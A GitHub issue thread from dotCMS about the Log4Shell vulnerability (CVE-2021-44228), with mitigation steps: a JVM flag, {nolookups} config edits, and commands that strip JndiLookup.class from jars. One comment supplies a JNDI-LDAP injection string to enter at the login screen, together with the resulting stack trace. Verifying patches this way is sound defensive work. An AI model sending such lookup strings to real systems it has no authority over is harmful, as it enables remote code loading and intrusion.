### ISSUE TITLE
log4j2 zero day exploit

### ISSUE THREAD

**Issue by wezell** [dotCMS/core#21393]
For more information, see:
https://nvd.nist.gov/vuln/detail/CVE-2021-44228

Examples of companies affected:
https://github.com/YfryTchsGD/Log4jAttackSurface

To mitigate the issue, customers need to set 
`-Dlog4j2.formatMsgNoLookups=true` in their JVM arguments.

**Comment by wezell** [comment]
Note for Customers:

- We're aware of the issue, and currently working on a fix for v5.3.8 LTS and v21.06 LTS.  These images will be available shortly and we will install them for our cloud customers as they become available.

- For versions earlier than 5.3.8, and for all customers not using dotCMS Docker containers, the fix is to apply a configuration change to the log4j2.xml file and append `{nolookups}` to each pattern to prevent the lookup from taking place.  

As way of example, this log4j2.xml

```xml
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="INFO">
    <Appenders>
        <Console name="Console" target="SYSTEM_OUT">
            <PatternLayout pattern="%d{HH:mm:ss.SSS}  %-5level %logger{2} - %msg%n" />
        </Console>
    </Appenders>
    <Loggers>
        <Root level="info">
            <AppenderRef ref="Console" />
        </Root>
        <logger name="com.zaxxer.hikari" level="warn" additivity="false">
            <AppenderRef ref="Console"/>
        </logger>
    </Loggers>
</Configuration>

```

should be changed to 

```
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="INFO">
    <Appenders>
        <Console name="Console" target="SYSTEM_OUT">
            <PatternLayout pattern="%d{HH:mm:ss.SSS}  %-5level %logger{2}{nolookups} - %msg{nolookups}%n" />
        </Console>
    </Appenders>
    <Loggers>
        <Root level="info">
            <AppenderRef ref="Console" />
        </Root>
        <logger name="com.zaxxer.hikari" level="warn" additivity="false">
            <AppenderRef ref="Console"/>
        </logger>
    </Loggers>
</Configuration>
```

**Comment by sfragata** [comment]
> Note for Customers:
> 
> * We're aware of the issue, and currently working on a fix for v5.3.8 LTS and v21.06 LTS.  These images will be available shortly and we will install them for our cloud customers as they become available.
> * For customers who have a WAF - most WAF providers have already provided a rule that will block any request that contains the pattern `${jndi:`
> * For versions earlier than 5.3.8, and for all customers not using dotCMS Docker containers, another fix is to apply a configuration change to the log4j2.xml file and append `{nolookups}` to each pattern to prevent the lookup from taking place.
> 
> ### Old/Bad log4j2.xml
> ```
> <?xml version="1.0" encoding="UTF-8"?>
> <Configuration status="INFO">
>     <Appenders>
>         <Console name="Console" target="SYSTEM_OUT">
>             <PatternLayout pattern="%d{HH:mm:ss.SSS}  %-5level %logger{2} - %msg%n" />
>         </Console>
>     </Appenders>
>     <Loggers>
>         <Root level="info">
>             <AppenderRef ref="Console" />
>         </Root>
>         <logger name="com.zaxxer.hikari" level="warn" additivity="false">
>             <AppenderRef ref="Console"/>
>         </logger>
>     </Loggers>
> </Configuration>
> ```
> 
> ### Patched Log4j2.xml - {nolookups}
> ```
> <?xml version="1.0" encoding="UTF-8"?>
> <Configuration status="INFO">
>     <Appenders>
>         <Console name="Console" target="SYSTEM_OUT">
>             <PatternLayout pattern="%d{HH:mm:ss.SSS}  %-5level %logger{2}{nolookups} - %msg{nolookups}%n" />
>         </Console>
>     </Appenders>
>     <Loggers>
>         <Root level="info">
>             <AppenderRef ref="Console" />
>         </Root>
>         <logger name="com.zaxxer.hikari" level="warn" additivity="false">
>             <AppenderRef ref="Console"/>
>         </logger>
>     </Loggers>
> </Configuration>
> ```
> 
> ## Verifying Fix
> You can test whether this behavior fixes the issue by going to the dotCMS back end login screen and trying to login with `${jndi:ldap://nope.dotcms.com/exploit}` as the user name/email. If your system is vulnerable, you will see an error in your logs/catalina.out like:
> 
> ```
> INFO: HV000001: Hibernate Validator 4.3.2.Final
> 2021-12-10 19:53:53,135 Log4j2-TF-1-AsyncLogger[AsyncContext@39ee94de]-1 WARN Error looking up JNDI resource [ldap://nope.dotcms.com/exploit]. javax.naming.CommunicationException: nope.dotcms.com:389 [Root exception is java.net.UnknownHostException: nope.dotcms.com]
> at java.naming/com.sun.jndi.ldap.Connection.<init>(Connection.java:252)
> at java.naming/com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137)
> at java.naming/com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1616)
> at java.naming/com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2847)
> at java.naming/com.sun.jndi.ldap.LdapCtx.<init>(LdapCtx.java:348)
> at java.naming/com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60)
> at java.naming/com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61)
> at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:204)
> at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
> at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
> at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)
> at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)
> at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:184)
> at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1054)
> at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:976)
> at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:872)
> ```
> 
> If your system is patched, you should only see a normal login error like:
> 
> ```
> Invalid email throwing a UserEmailAddressException: ${jndi:ldap://nope.dotcms.com/exploit}
> ```

I don't think {nolookups} are going to work with old log4j versions (we have `dot.log4j-core-2.3_2.jar`into our dotcms), that's why apache gave to us one hardcore mitigation

```
Mitigation: In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases >=2.7 and <=2.14.1, all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m. For releases >=2.0-beta9 and <=2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
```
https://logging.apache.org/log4j/2.x/security.html

**Comment by wezell** [comment]
The log4j `{nolookups}` switch in the config file does indeed work in log4j2x.  What was added in `log4j >=2.10,` was the **global** system property to turn it off system wide.

But yes, to your point perhaps an easier fix is to remove the class from the `log4j-core-*.jar`.

```
find $DOTCMS_ROOT -name "log4j-core-*.jar" -exec zip -q -d {} org/apache/logging/log4j/core/lookup/JndiLookup.class \;
```

**Comment by sfragata** [comment]
It was I did @wezell 
thanks

**Comment by monzonj** [comment]
The command for removing the `JndiLookup` class is wrong for version 4.x. 

The path is actually:

```
find $DOTCMS_ROOT -name "*log4j-core-*.jar" -exec zip -q -d {} com/dotcms/repackage/org/apache/logging/log4j/core/lookup/JndiLookup.class \;
```

because dotcms has repackage all classes to `com/dotcms/repackage`

**Comment by wezell** [comment]
Thanks Jose, you are absolutely correct, this is the command needed to remove the class for 3.x and 4.x

**Comment by nollymar** [comment]
**Internal QA:** Passed

**Comment by bryanboza** [comment]
Fixed, tested on release-21.12 and here the error after try to login with this values 
https://gist.github.com/bryanboza/2e876972b6f1aad78da824f4d816065d

**Comment by sfragata** [comment]
Hi @bryanboza , did you post the right log ?
this https://gist.github.com/bryanboza/2e876972b6f1aad78da824f4d816065d shows the same problem that log4j tried to reach `ldap://nope.dotcms.com`

**Comment by bryanboza** [comment]
Hi @sfragata, 

Yes, seems I was confused, we are taking look of this fix because we are getting the same error.

**Comment by nollymar** [comment]
@sfragata @bryanboza it isn't working because of an internal procedure we are fixing now, but the fix is correct. I'll keep you posted.

**Comment by nollymar** [comment]
New patch for tomcat9: https://github.com/dotCMS/tomcat/pull/21

**Comment by bryanboza** [comment]
Fixed, after some changes now we fixed this, Tested on release 21.12 // Docker // FF 

Here the log: 
```
testing_pg-dotcms-1         | 17:34:40.078  ERROR ejb.UserManagerImpl - Invalid email throwing a UserEmailAddressException: ${jndi:ldap://nope.dotcms.com/exploit}
```
